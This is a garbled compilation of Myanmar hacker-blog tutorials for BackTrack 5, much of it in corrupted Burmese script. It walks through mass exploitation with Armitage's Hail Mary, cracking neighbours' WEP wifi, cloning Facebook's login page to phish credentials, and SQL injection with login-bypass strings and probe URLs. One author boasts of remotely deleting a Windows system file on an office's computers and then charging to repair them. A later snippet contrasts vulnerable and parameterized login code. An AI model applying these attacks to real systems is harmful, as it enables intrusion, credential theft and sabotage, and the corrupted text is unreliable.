Backtrack 5 > Theharvester Information Gathering Tutorial Posted on August 26, 2012 by Dominator
Information Gathering ထ Step ) - ထ ထ
./theHarvester.py -d google.com -l 500 -b google
./theHarvester.py -d targetsite.com -l 500 -b google
Personal Inf - ထ
Kyaw Swa Htoon ထ ထ ထ –
ယခ ႏစကနပငးေလးမာ ကေနာရ႕ခစလစြာေသာ လကတြေဖာ ညအစကေတြက
ကေနာရ႕နညးပညာေလလာေတြ႕ရခကအခ႕က သငၾကားျပသသြားမာပါ..ကေနာတ႕အဖြ႕ေတြက
Gray Hack ေတြျဖစတာန႕အည ကေနာတ႕ရ႕စတေတြဟာလ မးခးလဘ အျမေျပာငးလေနတာပါ..
ကေနာတ႕တတကၽြမးတနညးပညာေတြန႕ကယန႕နးစပရာ ကြနပတာအသးအျပသမားက ကသလ
လရ ၀မးလ၀ ဆတစတထားန႕ကညခၾကပါတယ.ဒလကညႏငဖ႕ဆတာကလ..တစလႏစလအတြငး
သငယတတေျမာကလာတ ပညာရပေတြန႕ကညတာမဟတပါဘး..ႏစရညလမား ကယဘာသာ
အငတာနကမာေရာ.အျပငေလာကမာပါ ဆရာမရဘ ေလလာသငၾကားခရတသေတြပါ..ျမနမာႏငင
ဟာ နညးပညာေခတကဥးတညေနၿပ..တးတကလာေနၿပ..အတကအခကေတြမားလာေနၿပ.ေနာက
ပငး ႏငငကျမငမားတ နညးပညာေတြလႊမးမးလာေတာမယဆတာ သာမနလတနးစားေတြ ဘယသမ
သပမသၾကဘး..ဒါေၾကာင အခကတညးက တကခကဖ႕ကာကြယဖ႕ကေနာတ႕ေတြျပငဆငေနၾက
တယ..ဥပမာ ေျပာရရင လာမယႏစႏစအတြငးမာ ကြနပတာတစခလးအတြငးမာရတ Data ေတြက
အေ၀းထနးစနစန႕ဖကဆးပစႏငေလာကတအထ နညးပညာေတြျမငမားလာေတာမယ.အခကတညး
ကအရပ အေယာငေတြ ျပေနၿပ.စမးသပခကအခ႕ေအာငျမငေနၿပ..ဒါေတြက သေနလ႕
ကြနပတာအသးျပသတငးက တတကၽြမးနားလညသမားက ကာကြယဖ႕နညးလမးေတြေျပာျပေန
တယ.. ဒလ ေျပာျပေနတာေတြက ေစတနာကနားမလည..အသအမတမျပ
“ေပါေတာေတာ..ရးေၾကာငေၾကာင”အလပေတြလ႕”.ကေနာန႕သကဆငသတစဥး..ဒါမမဟတအျခား
တစေယာကကကေနာကေစာကားခတယ..။ ကေနာလ
Generated by Foxit PDF Creator © Foxit Softwarehttp://www.foxitsoftware.com For evaluation only.
အရာရာသးခလာသမ..ဒတစခကတညးနတင ေစတနာဆတာ လတငးန႕မတနပါဟ
နားလညခတယ..ေအာ..ကယပါးစပပတမေနႏငလ႕အေျပာခခရတာဘေလ။
ဒေနရာမာ တစျခားတစစမးတစေယာကသာဆရင ကေနာလကစားေခမမာဘ ကြနပတာတစလးရ႕
တနဖးက အနညးဆး ေလး ငါး ေျခာကသနးေလ..အလတနဖးကခဏခငး အေ၀းကေနဖကဆးပစ
လ႕ရတယ..ပကသြားခရငလ ဘယလတရားစြခငသလ.သကေသရသလား မရဘးေလ.ဒါေၾကာင
ကယဘကက အျမတကနတာေပါ..ထားပါေတာ ဒါကေနာေျပာျပတာပါ..တကယလ႕ ကေနာအဖြ႕
ထက ညအစကေတြကလ ေစတနာေစာကားခသညရေသာ.ဘယလနညးန႕လကတ႕ျပနႏငတယ
ဆတာ ကေနာ သငၾကားျပသေပးသြားမယ.အငဂငနယာဘာသာရပပျဖစျဖစ..သတေဗဒ
ဘာသာရပပျဖစျဖစ.. ပညာရပက ပညာရပဘျဖစတယ.ကေနာတ႕အေနန႕ဘယသ႕ဘယသ႕ကမလ
ပညာရပန႕ပတသကၿပးမေစာကားခဖးဘး..ကေနာတ႕ရ႕ Hacker ပညာရပန႕ပတသကၿပးေတာလ
ေစာကားတာမခႏငဘး.ပညာရပသငၾကားတယဆတာ ၀မးစာရာဖ႕လ႕ေလာကအကး အသးခဖ႕ဘ
ေလ.. သတစပါးရ႕ ပညာက ရကပတေစာကားဖ႕ စတဓာတလး၀မရရးအမနပါ.ဒလစတဓာတမးရတ
သေတြကလ ကေနာတ႕အေနန႕အျပငးအထန ရႈတခပါတယ..ကေနာတ႕ရ႕ ပညာရပန႕ပတသကၿပး
မယရငစမးသပၾကညႏငပါတယ..မလပခငလ႕မလပတာဘရတယ..လပၿပေဟဆလင ၾကပငခတ
ၾကငတပါမကနရငးတတတာ Zer0 0r Her0 ရ႕အကငပါ..။ ျမနမာႏငငမာ အတတပညာသာရၿပး
အသပညာေတြနမပါးေနပါၿပ…ဘြ႕ရပညာတတဆတငးလ ေသာကထငမၾကးပါ..ဘာလ႕လဆေတာ
အသပညာနမပါးေနလ႕ပါဘ..ေစာကားတာလမဟတသလ.ဘယသ႕ကမလညးမရညရြယပါ..အမား
စက ဥးတညေျပာေနျခငးျဖစပါတယ.အထမယ ကယမားပါေနရငေတာ ျပငလကေပါေလ..အဟတ။
ဒါေၾကာင ဘယသ႕ကမလညး ပညာရပန႕ပတသကၿပးအထငမေသးပါန႕..မေစာကားပါန႕.ကယက
ကယလညး အထငမၾကးပါန႕..အားလးကသနရာသနရာ ပညာရပတစခမေလာကလမးေနရတာပါ
ဥးတညခကက ဘ၀အာမခခကရဖ႕န႕စား၀တေနေရးအတြက ဆတာ အတတခညးပါဘ။ ဒါေၾကာင
Zer0 0r Her0 အဖြ႕သညလညး က႕လမးကယေလာကေနျခငးပါ..ဘယသ႕မ ေသာကဂရမစကပါ။
အျမတမးနညးပညာန႕ပတသကရင တတကၽြမးတပညာရငေတြန႕တငပငၿပးကညေပးေနတတသလ
မမတ႕ပညာရပကတနဖးထားသညအတြက ေစာကားပတခတလာလငလ တကခကဖကဆးဖ႕၀နမ
ေလးတတပါ..။ အခ Buffer Over Flow န႕ဆကႏြယတNetwork Hacking
ကသငၾကားျပသေပးမာျဖစပါတယ..
အေျခခရသေရာ၊ မရသပါ လကေတြ႕လပေဆာငႏငေအာင ေရးသားထားပါတယ။
ဆတာ ဟ႕အရငကတညးက ခထ application , os န႔ တျခားsoftware
ေပါကေနသည vulnerability က exploit လပႏငတနညးပါ။ အခက Network Hacking န႕ေရာၿပးတငျပ
သြားမာျဖစပါတယ..အရငဆး BackTrack 5 ကအသးျပၿပး သကဆငရာ Target ရ႕
Ip Addressခတဆကၿပး ၄ငးရ႕ ကြနပတာအတြငးသ႕၀ငေရာကမာပါ..၄ငးရ႕ ကြနပတာအတြငး
ေရာကပဆမေတာ Computer အတြငးမယရတ Data ေတြကဖကမလား..ScreenShoot ရကမလား။
အငတာနကဆငမာသးေနရငး တစဆငလးမာရတ ကြနပတာေတြကထနးခပခငသလား.၊
Wireless ကြနယကမာ Server အပါအ၀င Wireless သးေနတကြနပတာ Laptop ေတြကထနးခပခင
သလား.ဒနညးက သပကအသး၀ငပါလမမယ.ကေနာလကေတြ႕အေနျဖင ေနျပညေတာတကသလတစခမာ
ရတ Wireless ကြနယကက စမးသပၾကညရာမာ Network န႕ခတဆကထားတကြနပတာ Desktop
ၾကးေတြ သာမက.. Wireless သးေနတကြနပတာ Laptop ေတြကပါထနးခပလ႕ရခပါတယ.ဒါေပမယ
ကေနာ ဘားမမလပခပါဘး.လပမယလပခငရငလ အားလးက Format ခညးရကေပးလကခငပါတယ.ဒါေပ
မယ ကေနာခစသကြနပတာ i5 Laptop ေလးထသြားမာစးတအတြက မလပခပါဘးေလ…အဟတ။
က.လပေဆာငပအဆငဆငကဆကေျပာပါမယ…။
BackTrack Terminal ကအရငဖြငပါ။
အရငဆး cd /pentest/exploits/framework ကရကပါ။ပမာျပထားပါတယ.ၿပးေတာ ls ကရကၾကညလက
Armitage ကေတြ႕ပါမယ။ Armitag ကေခၚမယ။ ./armitage ၿပးေခၚလကပါၿပ.ပမာၾကညပါ။
ေအာကပါ ပအတငး Box တကလာရင Start MSF ကႏပပါ။ Default user
အတငးဘထားပါ.ဘားမမေျပာငးပါန႕။(BackTrack5 R3 မာဆရင ေတာ Connect န႕ Help
ဘေပၚမာပါ။ Connect ကႏပလကပါ Yes or No ေမးရင Yes ေပးလကပါ။ Progress Bar
တကလာပါလမမယ ေစာငၾကညေနလကပါ။ျပညသြားၿပဆတာန႕ေအာကပပါအတငး……….
Armitage Promgram ေပၚလာၿပ..ပပါအတငးျပလပပါမယ။ အေပၚက Tool Bar
ထက Host > Namp Scan > Quick scan(Os detect) ကေရြးပါမယ။ (BackTrack R3
မာဆရငေတာ MSF Scans ကေရြးေပးရပါမယ။)
R3 မာ MSF Scans ကေရြးေပးလကတာန႕ IP ထညစရာ Box ေလးတကလာပါလမမယ။
ဥပမာအားျဖင Network တစခတြငးမာ ကြနပတာ 15 လးရတယဆပါစ႕.. အဒကြနပတာအငပေတြ
က 192.168.1.1 ကေန 192.168.1.15 အထသတမတထားပါတယ။ ဒေတာ အငပထညစရာ Box
ထမာ 192.168.1.1-192.168.1.20 လ႕ရကထညေပးၿပး OK ေပးလကပါ။ Open ျဖစေနတ TCP
ေတြက စရာေနပါၿပ..Complete ျဖစတအထ ေစာငေပးပါ။ Scan Complete ျဖစၿပဆတာန႕
Network အတြငးမာရတ ကြနပတာေတြ ကျမငရေတာမာပါ။
Tool Bar က Attack > Hail Mary ကေရြးပါ..အဒအခါမ Exploit ေတြက Scan
ဖတေနတာေတြ႕မာပါ။ Scan ဖတၿပး တာန႕ ခဏေစာငၾကညေနပါ.. Prot Attack
ခရတကြနပတာဟာ မးၾကးပအနေရာငန႕ျပေနမာပါ။ အဒကြနပတာက Right Click ေထာကၿပး
စတၾကက ေမႊႏငပါၿပ..။
Screen Shoot ရကမလား၊System 32 ထက၀ငေမႊမလား..Data ေတြက Download ခမလား၊
Upload တငမလား၊ Target ကြနပတာထမယ Shell တငမလား..Virus
လႊတမလား..ကေနာကေတာ ဘာလပသလဆရင System 32 ထက ၀ငၿပး hal.dll ကဖကပစလက
တယဗာ..အအခါကရင ၀ငးဒးတကမလာေတာဘးေလ..မၾကာပါဘး ေနာကထပ တစနာရေလာက
ဆရင ကေနာက ဌာနဆငရာေတြကဖနးဆကၿပးေခၚပါတယ… “ကြနပတာ Windows ကသြားလ႕
လာတငေပးပါဥး” တေလ..က..၀ငးဒးတစခါတင 7 ေထာငဗာ…အေ၀းကေနထငဖကတယ…..
ဖနးဆကေခၚရင သြားျပငေပးလကတယ..လာထား 7 ေထာင..ကယစားေပါကန႕ကယကေတာ
အဆငကေျပလ႕ေပါ…ဟဟ…..။
www.minsoeyarsar.com
Blogger Zer0 0r H3r0
Dual Boot install Backtrack 5 Posted by Aung Kyaw Moe
Backtrack 5 က ကြနေတာ Window 7 နတြတငနညးေလးေရးေပးပါမယမခကပါဘး လြယပါတယေတာေတာကလြယပါတယ အရငဆး Backtrack 5 က Live အေနန Boot တကလကပါ ေနာက startx ကနပျပး ငလကပါ ျပးရင Backtrack 5 ေပါလာပါလမမယေနာက Desktop ေပါမာရတ Install Backtrack ဆတ icon ကနပျပး Install လပဖျပငဆင ပါ ………..ပမာျပထားပါတယ ……….:P
ပမာျပထားတအတငးပ next ကနပလကပါ…….ေနာကတစပကၾကညပါ……….
ပမာျပထားတအတငးပ Region န႕ Time Zone ကေျပာငးေပးလကပါေနာက Next ကႏပပါ………
Forward ကႏပပါ…………
ကြနေတာတ က Partitions ကအသစနခြတငပါမယ အဒါေျကာင Specify partitions manually (advanced) ကေရြးလကပါ ေအာကမာျပထားတအတငး Box ေလးကလာပါလမမယ
ကယထားခငတ Amount ေလာကထားလကပါ အေရးျကးတာက mount point ေနရာမာ / ေလးကေရြးေပးဖမေမပါနေနာ….ေနာက OK ကနပပါ တစခါ
ကြနေတာေလာေလာနကနခတာရပါတယ swap file ကလ 1 Gb ေလာကထားေပးလကပါ Specify partitions manually (advanced) ကေရြးလကပါ အေပါကနတတပါပ mount point ေနရာမာ
swap ကေရြးေပးပါ အဒါဆရပါျပေနာက OK ကနပပါ…….
Install ကနပပါ…………….
သြငးျပးတအထေစာငပါ အားလးျပးသြားရငေအာကကအတငးပ ေပါလာပါလမမယ အခါကရင Restart လပလကပါ ျပနတကလာရင Dual Boot နတကလာပါလမမယ
Default username and password က root/ toor ျဖစပါတယ ေနာက Graphic interface က run ဖအတြက Startx လ command ေပးရပါမယ…… အေလာကဆအဆငေျပ မယလေမာလငပါတယ ကြနေတာတသညလညးအရမးကေတာေနတတေနတသမားမဟတျကပါ သာမနေလလာသအဆငေလာကသာရပါေသးတယ ဒါေပမယကြနေတာတ သသမ တတသမေလးေတြက သငယခငးမားအားလးအလြယတကေလလာနငေအာင ေရးတငေပးထားျခငးသာျဖစပါတယ အားလးပအဆငေျပတာမေျပတာေလးေတြက comment ေလးေတြထားေပးခေစခငပါတယ……ဒပစျဖင သငဆရာ ၊ ျမငဆရာ ၊ ျကားဆရာမားအားလးက ဂါရျပလကပါတယ…………:P
Cracking WEP Key With Fern-Wifi Cracker In Backtrack 5 R3 Posted by Aung Kyaw Moe
ကၽြနေတာတ႕ သငယခငးမားေဘာတာမားက Backtrack က Wifi Hack အေနန႕ပ သၾကတာမားပါတယ Wifi Hack ေၾကာငပ Backtrack ကသၾကပါတယ ကၽြနေတာေလလာထားသေလာကေပါေနာ အေတာကၽြနေတာလညးစဥးစားတယ wifi hack အေၾကာငးေလးေရးမယေပါေနာ ဒါေပမယအခဟာကကၽြနေတာရ႕ ပစက တစကယ အစစ လႊငထားတလငးေတြေပၚမာစမးထားတာဆေတာ သတ႕က ( wifi ) လႊငတဆငေတြကအားနာတာကတစေၾကာငးဆငးတငးကအစကေတြန႕သေနတာကတစေၾကာငး သတ႕ wifi password က ဆဒေပၚမာဟတျပးမျပခငတာကနားလညေပးပါလ႕ပထမဆးေမတာရပခခငပါတယ အခေျပာျပမယ fern-wifi cracker ကဘယေလာကေတာငလြယလဆရငသက ေလးတနးကေလးကေတာငကြနျပတာကငျပးဟတလ႕ရပါတယ အရငလ command ေတြန႕မရႈပေတာပါဘး လြယပါတယ ကစရေအာင အရငဆး Fern-wifi cracker ရတေနရာကသြားလကပါ ေအာကမာျပထားပါတယ
ျပးရငဖြငလကပါ ေအာကမာက fern-wifi cracker က GUI အေနန႕ေတြ႕ရတပ
အေပၚကပမာ Select Interfaces ေနရာမာ wlan0 ကေရြးလကပါ ေနာက ေအာကက Scan For
Access points ကႏပလကပါ ေအာကကမနေနတဟာေလးေတြလငးလာပါလမမယ button ကေျပာတာေနာ………….:P
ႏပလကပါ ေအာကကပမာၾကညပါ ႏပျပးသြားတအေျခအေနေပါ သက လငးေတြကရာျပးရင ဘယႏစလငးရလေဘးမာေဖာျပပါလမမယ ေအာကကပမာၾကညပါ
အခကၽြနေတာတ႕ က WEP က ဟတမာပါ အေတာ WEP ကငါးလငးရပါတယ Wifi WEP ကႏပလကပါ ေအာကကပမာၾကညပါ ရေနတလငးေတြကျပပါလမမယ
ကအေနာကေတာကယလငးကျပနဟတတယဂာ ဟးဟး :p ကေရြးလကပါတယ အစကတ႕ေတာအစကတ႕ေပၚတဟာေရြးေပါေနာ သားန႕ေတာတမာမဟတဘးေလေနာ ေနာကမ Group ထမာဟနငန႕လညးတဘးဆျပးလာေျပာန႕……..:P ေနာက WIFI Attack ဆတအေပၚဆးက Button ကနပလကပါ…….ေအာကကပမာၾကညပါ……….:D
ကအခဆရငအားလးအလပလပေနပါျပ………..:P ေအာကကအနတနးေလးျပညသြားရင ေအာကဆးမာ Password ထြကလာပါလမမယအေနာ Password ထြကတ screenshot ကေတာမထညေတာပါဘး….:D မရလ႕မဟတပါဘး ရမရကေတာအစကတ႕ဟတၾကညရငသမာပါ အေနာမကႏာနာလ႕ထညေတာဘး…အဆငေျပပါေစ… Wifi လငးမားက ဟတ ျပးပကပကမကနပသးႏငပါေစလ႕ဆေတာငးေပးလကပါတယ အေနာကေတာေပးျပးသးတာ ဟးဟး ………..:P
ဆကလကၾကးစားပါအးမယ
ေကးဇးတငပါတယ………..;)
Hack Facebook Account in Back Track Posted on August 26, 2012 by Dominator
..
- .
၂ .. 2.Website Attack Vectors
၃ .. 4.Tabnabbing Attack Method
Enter the URL yo Clone: W - —
http://www.facebook.com/login.php …
Install Nvidia Driver in Backtrack 5 R3 (Easy Way) Posted by Aung Kyaw Moe
ကၽျနးေတားတ႕ ကျနးပတာမြာ Graphic Driver ကလညးအေရၾကတာကေနား အေတာ ကၽျနးေတားတ႕ Linux မြာလညး Graphic Driver သျငးလ႕ရပါတယးအဒါသျငးပမြ Compiz ကအလပးလပးပါတယး (Backtrack မြာေပါေနား………:D) အခကၽျနးေတားေပာပမယးနညးက လျယးပါတယးေနာကး တခာနညးေတျထကး ၅ဆ ေလာကးပမနးပါတယး ပေတာဒပစးမြာ ပမတငးပါဘ ဘာလ႕လဆေတာတငးစရာကမလေအာငးလျယးေနလ႕႔ပါ……………….:P
အရငးဆ ကၽျနးေတားတ႕ Backtrack က restart ခပါမယးေနာကးအရငးအတငးပBoot တကးပါမယးပရငး Login ငးပါမယးေနာကးအမြာအေရၾကတာက Startx ကမရကးခငးလပးရမြာပါ ကစရေအာငးသျငးနညးေလ………….:P
အရငးဆကၽျနးေတားတ႕ Graphic Driver ကေဒါငးလဒးလပးရပါမယး ဘယးမြာလပးရမလဗာ ေအားသ႕ရ႕ဆဒးမြာသျာလပးေပါေနား ေအာကးကလငးကသျာလကးပါ အမြာကယးရ႕ Graphic Driver ကေရျ ပ ေဒါငးလဒးလပးပါ ..
Driver Download: http://www.nvidia.com/Download/index.aspx?lang=en-us
ပရငးသကNvidia-linux.run ဆပ run ဖငးေလကလာပါလမးမယး ပရငးေဒါငးထာတ .run ဖငးေလက root ေအာကးမြာသျာထာလကးပါ အဒါမြရြာရတာလျယးမြာ တစးခါတညး Install လပးယပ………..:D ကအခ ေအာကးကအပာေရာငးစာသာေလႏြစးခက Terminal ထမြာ တစးခခငးစရကးထလကးပါဘာဖစးဖစးေပါေနား ဒတယအေၾကာငးကေတာနန Error ပ ပါလမးမယး ဒါေပမယး ကစၥမရြပါဘ …………..:P
1. echo options nouveau modeset=0 | sudo tee -a /etc/modprobe.d/nouveau-kms.conf
2. update-initramfs -u
ဒေနရာမြာ အလျနး႕အလျနးအေရၾကတာကေတာ အႏြစးေၾကာငးလထညးပတာန႕ X Server က Kill ရမြာပါ reboot လပးပါ မလပးခငးရငး Ctrl+Alt+F1 ကတျႏြပးပါ GUI Backtrack ေခၚ X Server
ၾကကသျာပါလမးမယးအခါမြ အမေရာငးန႕ command ရကးဖ႕ root@bt ~ ဆပေပၚလာပါလမးမယး startx ရကးပမငးခငးမငးရတပေပါေနား အမြာ
3. init 3
ကရကးထညးပါ အေရၾကတာက startx ကမရကးခငးအ command ေပရမြာေနား…………..:D
4. sh <filename>.run ————->
အလညးကFile name က ေဘာတာတ႕ေဒါငးလဒးလပးထာတ graphic driver name ပါမမြာေအာငးရကးပါေနား…………:P
အဒါဆရပါပ ကနးတာကေတာလပးတတးမယးထငးပါတယးမေရေတာပါဘအေနားကရြငးသျာစရာေလရြလ႕႔ပါ Screen Shot မတငးေပႏငးတာချငးလျတးပါ ဒနညးက တစးခာပမြနးသျငး နညးေတျထကး ၅ဆ ပမနးပအလပးဖစးပါတယးကၽျနးေတား ကယးတငးလညးဒလပသျငးထာ တာပါ
ဆကးလကးၾကစာပါအမယး ေကဇတငးပါတယး………….:P
Killing Antivirus In Backtrack 5 Posted by Aung Kyaw Moe
Among the Forensics Tools included in Backtrack, I will introduce two tools for killing rootkits and Trojans:
1. chkrootkit and 2. rkhunter
chkrootkit takes very little time to scan, while rkhunter takes a few minutes. Scanning with only one of them does not give much assurance; to clear out rootkits it works better to scan with both... Let's try it...
Application>Backtrack>Forensics>Anti-virus Forensics Tools>
Go there and you will find Chkrootkit and rkhunter. Open Chkrootkit first... It is shown in the picture......:D
These are its usage and options. The command is ./chkrootkit, as shown in the picture.
This is the scan in progress, see below.....:)
It checks by itself and also removes anything it finds.. This is the picture after the scan has finished.
Now open the other one, rkhunter.
Next, rkhunter should be updated, and after that we will run the check. First type rkhunter --update, and when that is done check with rkhunter --check. It takes quite a long time..........:P Below is the check in progress..........:D During the check you will be asked to press enter three times. My connection keeps going up and down, so I have not uploaded any more pictures ........:D
This is the picture after it has finished ........see below.........
When it has finished you can look at the log files. You can view them at /var/log/rkhunter.log. In the Terminal you can view it by giving the command gedit /var/log/rkhunter.log. It is shown below............
အခနကသပမရတာကတစေၾကာငး စာေမးပြကနးေနတာကတစေၾကာငး ေလာကလညခငေနတာကတစေၾကာငးတစေၾကာငး ေပါငးမားစြာျဖစ ေနေသာေၾကာင ပစေတြနနက ေနတာပါ ေနာကစာေမးပြျပးရငဒထကပအားစကျပးေရးပါမယအခေတာ
စာလညးလပေနရတာေၾကာငအရငလသပမရငးျပႏငတာန႕ လ အပခကမားရရင ခြငလြတေပးပါလ႕ေတာငးပါခငပါတယ
ဆကလကၾကးစားပါအးမယ………….;P
SQL Injection Attack Myanmar Version for Begineers
3thic0kiddi3
SQL Injection Attack For Beginners By 3thic0kiddi3
-- What SQL INJECTION is (written by Ko BrB)
SQL injection is the most common web application flaw on internet websites today. Through such a flaw in a web application, unauthorized users (hackers) can take your important information. SQL injection is therefore not caused by a fault in the web or db server, but by programmers with little experience and weak skills. With this technique the application and web server can easily be controlled from a remote location. In SQL injection, various SQL commands are used to extract various data through the web page.
As an example, if we were going to get into a company's network, we could scan it with port scanners and get in through ports left open by mistake. But if a Web Server (Host Server) connected to the internet opens only port 80 and has other security measures in place, then no matter how good the port scanner is it will not help, and getting in becomes difficult...
In that case attention has to turn to Web Hacking... When Web Hacking is mentioned, most people think of SQL Injection first... That is right: SQL Injection needs nothing else, only a Web Browser...
Explanations about SQL Injection -
It is best to have some web development knowledge related to SQL injection. With a little knowledge of PHP and MySQL it will be easier to understand.
---What is a DATABASE?---
Put simply, a database is an application that collects and stores data. It is built, used, maintained and stored through Application Programming Interfaces (APIs). Because Database (DB) servers can be combined with web development work, retrieving, using and viewing the data inside them is not a difficult matter. Since important information such as usernames and passwords can also be stored in a database, the security of the database is extremely important. In a poorly maintained database, or put another way, whether by oversight, carelessness or for various other reasons, mistakes in the code that programmers have written create such holes and can end up opening a path into the database for unauthorized intruders. Of the many DB servers that exist, these are the most widely used:
MySQL (open source), MSSQL, MS-ACCESS, Oracle, PostgreSQL (open source), SQLite, and so on...
The structure of a database is shown in a table so that it can be visualized.
---Bypassing Logins---
Logging in to a site with a username and password means that the content inside the site may be viewed and used only by registered users (those who have a username & password). If someone gets in and uses the site as though they had a username & password when they do not (getting in without user registration), this is called BYPASSING LOGINS.
This happens because the programmer's checks at login are not thorough, so with some luck it becomes possible to log in without knowing the user name and password.
As an example, say the username is admin and the password is 12345... The SQL query then becomes
SELECT USER from database WHERE username='admin' AND password='12345'
If the SELECT command above evaluates to true, access to the site is granted. If, as described above, the programmer has no proper checks at login, hackers can get in as follows.
username:a or 1=1--
password:blank
In the SQL query this becomes
SELECT USER from database WHERE username='a' or 1=1-- AND password=''
This is a comment operator; another such comment operator is /*.
SELECT USER from database WHERE username='a' or 1=1
1=1 always makes the query true, and with OR, because one side is true the other is made true as well. So even though a user called 'a' does not exist in the DB, this query is true and admin access to the site is granted... In the same way, vulnerable sites can also be tested with the following...
username:' or 1='1 password:' or 1='1
username:' or '1'='1' password:' or '1'='1'
username:or 1=1 password:or 1=1
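Added example (not part of the original tutorial): the login query described above, built by string concatenation, beside a version that uses a bound parameter and a salted password hash. It runs against an in-memory SQLite database standing in for MySQL; the table names, function names and sample account are constructed for illustration.

```python
import hashlib
import hmac
import os
import sqlite3

PBKDF2_ROUNDS = 100_000


def hash_password(password: str, salt: bytes) -> bytes:
    """Salted, slow hash so a leaked table does not expose passwords directly."""
    return hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, PBKDF2_ROUNDS)


def make_db() -> sqlite3.Connection:
    """Constructed sample data: the page's admin / 12345 account, stored two ways."""
    conn = sqlite3.connect(":memory:")
    # Legacy layout assumed by the page's query: plaintext password column.
    conn.execute("CREATE TABLE legacy_users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO legacy_users VALUES ('admin', '12345')")
    # Hardened layout: per-user salt and PBKDF2 hash, no plaintext.
    conn.execute("CREATE TABLE users (username TEXT PRIMARY KEY, salt BLOB, pw_hash BLOB)")
    salt = os.urandom(16)
    conn.execute("INSERT INTO users VALUES (?, ?, ?)",
                 ("admin", salt, hash_password("12345", salt)))
    return conn


def login_vulnerable(conn, username: str, password: str) -> bool:
    """The pattern the page describes: user input pasted into the SQL text."""
    query = ("SELECT username FROM legacy_users "
             "WHERE username='%s' AND password='%s'" % (username, password))
    try:
        return conn.execute(query).fetchone() is not None
    except sqlite3.Error:
        # Unbalanced quotes in the input surface as a SQL syntax error.
        return False


def login_hardened(conn, username: str, password: str) -> bool:
    """Bound parameter for the lookup; password checked in code, in constant time."""
    row = conn.execute("SELECT salt, pw_hash FROM users WHERE username = ?",
                       (username,)).fetchone()
    if row is None:
        # Hash anyway so unknown users cost about the same time as known ones.
        hash_password(password, b"\x00" * 16)
        return False
    salt, pw_hash = row
    return hmac.compare_digest(hash_password(password, salt), pw_hash)


def run_demo() -> dict:
    """Return {case: (vulnerable_result, hardened_result)} for three logins."""
    conn = make_db()
    # Input that yields the query text shown on the page:
    #   ... WHERE username='a' or 1=1--' AND password=''
    tautology = ("a' or 1=1--", "")
    cases = {
        "valid": ("admin", "12345"),
        "wrong_pw": ("admin", "nope"),
        "tautology": tautology,
    }
    return {name: (login_vulnerable(conn, u, p), login_hardened(conn, u, p))
            for name, (u, p) in cases.items()}


if __name__ == "__main__":
    for name, (vuln, hard) in run_demo().items():
        print(f"{name:10s} vulnerable={vuln!s:5s} hardened={hard}")
```

With the bound parameter the whole input is compared as a username value, so the quote and the comment marker never reach the SQL parser.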
---Accessing Secret Data---
SQL injection က အခလ bypassing logins တစးခတညးမဟတးပ DB servers ကေန
လ႕ ြကးစျာသမးဆညးထာတ႔ Data ေတျက ရယႏငးပါတယး... အနညးငယးရႈပးေထျ ေနမြာၿဖစးတ႔အတျကး
နနေလ အထဂရၿပၿပေတာ ေလလာၾကညးပါ။ ေအာကးပငးမြာ လကးေတျ႔စမးလ႔ရေအား site link န႔ တကျ
ေဖားၿပေပထာပါတယး။
---Finding and Checking Weaknesses and Errors---
Site တစးခကရြာလကးမယး...
In PHP ==>>
www.site.com/article.php?id=5
id
variable assign လပးထာတ႔ ေနာကးနာက ' (apostrophe) ေလတစးခက
ထညးလကးပါမယး..
www.site.com/article.php?id=5'
ဒလလ
စမးတ႔ေနရာမြာ
Integer Based
www.site.com/script.php?param=36'
www.site.com/script.php?param='36'
www.site.com/script.php?param=(12+24)
www.site.com/script.php?param=%
www.site.com/script.php?param=36'a
String Based
www.site.com/script.php?param=Text'--
www.site.com/script.php?param=Te'+'xt
www.site.com/script.php?param=Tex%
ဆၿပရြပါတယး.. အဆငးေၿပသလ စမးသပးႏငးပါတယး...
အကယး၍ ၄ငးရ႕ site က vulnerable မၿဖစးဘဆရငး ပမြနးအတငး page loading လပးသျာပါလမးမယး..
အ႔လမဟတးပ query string filtering မရြဘဆရငး "MySQL Syntax Error By '5'' In Article.php on line
15." သမဟတး Check the correct MySQL version သ႔မဟတး MySQL Fetch error သ႔မဟတးပါက
ဘာမြမေပၚပ page အၿဖၾကသာေပၚေနပါလမးမယး... ဒါဆရငး ဒ site က vulnerable ၿဖစးေနပါတယး
အကယး၍ ' ၿဖငး မရလြငး ေအာကးပါအတငး union select 1-- ဆတာကသႏငးပါတယး။
www.site.com/article.php?id=5
union select 1--
In ASP
==>>
အထကးပါနညးအတငး
http://www.site.com/index.asp?id=5
ဆရငး
ေနာကးက ' (apostrophe) ေလထညးၿပစမးႏငးပါတယး။
http://www.site.com/index.asp?id=5'
ဒါဆရငး
Microsoft
OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC
SQL Server Driver][SQL Server]Syntax error converting the nvarchar
value 'table1' to a column of data type int.
/index.asp, line 5
ဆတ႔
error မေပၚေနတတးၿပ ASP, JSP, CGI, န႔ PHP web pages ေတျမြာ
စမးသပးႏငးပါတယး။
အကယး၍ URL မြာ မေပၚတ႔ parameters မဆရငး ၄ငးတ႔ရ႕ login page, search page, feedback
လေနရာမေတျက ရြာႏငးပါတယး.. တစးခ႕ html page ေတျက POST command န႔ ASP page က
ပ႔ေဆာငးေပတ႔ parameters သထာတတးပါတယး.. ဒါဆရငးေတာ ၄ငးတ႔ရ႕ HTML source code ထက
ငးေရာကးပါ။ ၿပရငး "FORM" tag ကရြာလကးပါ ...
ဥပမာ
<FORM action=Search/search.asp method=post>
<input type=hidden name=A value=C>
</FORM>
ဒ <FORM></FORM>
ႏြစးခၾကာက ၿဖစးႏငးေၿခေတျပါ။
<FORM action=http://duck/Search/search.asp method=post>
<input type=hidden name=A value='a' or 1=1--">
</FORM>
value မြာ အေပၚကအတငး BYPASSING LOGINS မြာသသလ စမးသပးၿပရြာေဖျႏငးပါတယး။
---Finding the Number of Columns---
‘order by’ ကအသၿပၿပ Columns မာက ရြာေဖျမြာၿဖစးပါတယး.. URL query ကေအာကးပါတငး
ရကးထညးလကးပါမယး... '/*' သ႔မဟတး '--" ဆတာေလသလ႔ရပါတယး..
www.site.com/article.php?id=5 order by 1/*
အမြာမေပၚဘဆရငး ေနာကးတစးခါ 2 ဆၿပတကာ ရကးထညးပါမယး
www.site.com/article.php?id=5 order by 2/*
ယခအခနးအထ
အမြာမေပၚေသဘဆရငး ေနာကးတစး ထပးၿပတပါမယး.. ဒလတတၿပ
အမြာေပၚလာတ႔အထ ရြာေဖျရမြာၿဖစးပါတယး...
